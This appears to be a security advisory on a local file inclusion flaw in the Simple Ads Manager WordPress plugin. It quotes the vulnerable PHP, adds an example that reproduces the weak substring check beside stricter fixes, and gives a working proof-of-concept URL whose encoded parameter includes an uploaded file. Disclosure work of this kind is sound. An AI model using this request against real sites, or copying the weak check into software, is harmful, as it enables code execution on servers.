Local File Inclusion (LFI) Vulnerability in Simple Ads Manager
In a previous post we looked at a local file inclusion (LFI) vulnerability in the plugin SAM Pro (Free Edition). Since that plugin is described as the successor to Simple Ads Manager (which is currently removed from the Plugin Directory), we took a look to see if Simple Ads Manager had the same vulnerability. As it turned out, the plugin was not really vulnerable until the same change that had been made in an attempt to fix the issue in SAM Pro (Free Edition) was made to this plugin as well.
In the prior version, 2.9.8.125, you can see that the file to be included was not user specified (lines 13 to 39 of the file /sam-ajax-admin.php):

```php
function samCheckLevel() {
    $level = 0;
    $upPath = '';
    $file = 'wp-load.php';
    $fe = false;
    while(!$fe && $level < 6) {
        $fe = file_exists($upPath . $file);
        if(!$fe) {
            $upPath .= '../';
            $level++;
        }
    }
    if($fe) return realpath($upPath . $file);
    else return dirname(dirname(dirname(dirname(__FILE__))));
}

$wpLoadPath = samCheckLevel();

ini_set('html_errors', 0);

$notShortInit = array('load_combo_data', 'load_users', 'load_authors');
$validUri = '';
$validRequest = false;

if( ! in_array($_REQUEST['action'], $notShortInit)) define('SHORTINIT', true);
require_once( $wpLoadPath );
```
The only way you could get a local file inclusion issue out of that code is if you could place a file named “wp-load.php” in the directory /wp-content/, /wp-content/plugins, or /wp-content/plugins/simple-ads-manager. If you could do that, you could likely just request the file directly instead of having to use a local file inclusion (LFI) vulnerability to do the same.
In the most recent version, 2.10.0.130, it was changed to match the code in SAM Pro (Free Edition) (lines 11 to 39 of the same file):

```php
$body = 'load';

if (!isset( $_REQUEST['action'])) die('-1');
if (!isset( $_REQUEST['wap'] )) die('-2');

$prefix = 'wp';
$suffix = 'php';
$wap = ( isset( $_REQUEST['wap'] ) ) ? base64_decode( $_REQUEST['wap'] ) : null;
$mlf = "{$prefix}-{$body}.{$suffix}";
$rightWap = ( is_null( $wap ) ) ? false : strpos( $wap, $mlf );
if ( $rightWap === false ) {
    exit;
}
$wpLoadPath = ( is_null( $wap ) ) ? false : $wap;
if ( ! $wpLoadPath ) {
    die( '-3' );
}

ini_set('html_errors', 0);

$notShortInit = array('load_combo_data', 'load_users', 'load_authors');
$validUri = '';
$validRequest = false;

if( ! in_array($_REQUEST['action'], $notShortInit)) define('SHORTINIT', true);
require_once( $wpLoadPath );
```
The only limitation is that the path you specify to be included has to contain the string “wp-load.php” somewhere in it, and there are multiple ways to accomplish that. One is the example we mentioned in the other post: if you could upload media on the website, you could upload a file named wp-load.php.gif with malicious PHP content. WordPress will rename that to wp-load.php_.gif, but otherwise leave it unchanged.
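To make the weakness concrete, here is the substring check from 2.10.0.130 placed beside two stricter alternatives. This is an added example, not the plugin's own code; the function names (samWeakWapCheck, samLocateWpLoad, samStrictWapCheck) and the sample path are constructed for illustration.

```php
<?php
// Added example (not code from the Simple Ads Manager plugin). Function
// names and sample values are hypothetical.

// Weak check, equivalent to 2.10.0.130: any decoded path that merely
// contains "wp-load.php" is accepted, so a renamed upload such as
// "../../uploads/2016/10/wp-load.php_.gif" passes.
function samWeakWapCheck($wap) {
    $decoded = base64_decode($wap, true);
    if ($decoded === false) {
        return false;
    }
    return (strpos($decoded, 'wp-load.php') !== false) ? $decoded : false;
}

// Preferred fix: do not take the include path from the request at all.
// Locate wp-load.php by walking up from the plugin directory, which is
// what 2.9.8.125 did, and ignore any caller-supplied value.
function samLocateWpLoad($startDir, $maxLevels = 6) {
    $dir = realpath($startDir);
    for ($level = 0; $level < $maxLevels && $dir !== false; $level++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return realpath($candidate);
        }
        $parent = dirname($dir);
        if ($parent === $dir) {   // reached the filesystem root
            break;
        }
        $dir = $parent;
    }
    return false;
}

// If a caller-supplied value must be kept for compatibility, constrain it:
// the decoded path must resolve (realpath) to exactly the wp-load.php that
// sits in the known WordPress root. A substring match is not enough.
function samStrictWapCheck($wap, $wpRoot) {
    $decoded = base64_decode($wap, true);
    if ($decoded === false || strpos($decoded, "\0") !== false) {
        return false;
    }
    $resolved = realpath($decoded);
    $root     = realpath($wpRoot);
    if ($resolved === false || $root === false) {
        return false;
    }
    $expected = $root . DIRECTORY_SEPARATOR . 'wp-load.php';
    // Rejects wp-load.php_.gif, copies in other directories, and traversal.
    return ($resolved === $expected) ? $resolved : false;
}

// Constructed demonstration: the same renamed-upload path against both checks.
$sample = base64_encode('../../uploads/2016/10/wp-load.php_.gif');
var_dump(samWeakWapCheck($sample));                       // accepted by the weak check
var_dump(samStrictWapCheck($sample, __DIR__ . '/../../..')); // bool(false)
var_dump(samLocateWpLoad(__DIR__));                         // path to wp-load.php, or false
```

The first function reproduces the flaw; the second is the change a defender would actually want, since the bootstrap file's location is derivable from the plugin's own position and never needs to come from the client. The third is only for cases where the parameter has to stay, and it works by comparing the fully resolved path with the one known-good file rather than by searching for a substring.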
Proof of Concept
The following proof of concept will cause a file located at /wp-content/uploads/2016/10/wp-load.php_.gif to be included.
Make sure to replace “[path to WordPress]” with the location of WordPress.
http://[path to WordPress]/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?action=NA&wap=Li4vLi4vdXBsb2Fkcy8yMDE2LzEwL3dwLWxvYWQucGhwXy5naWY=
Timeline
- 10/26/2016 – Developer notified of issue in SAM Pro (Free Edition).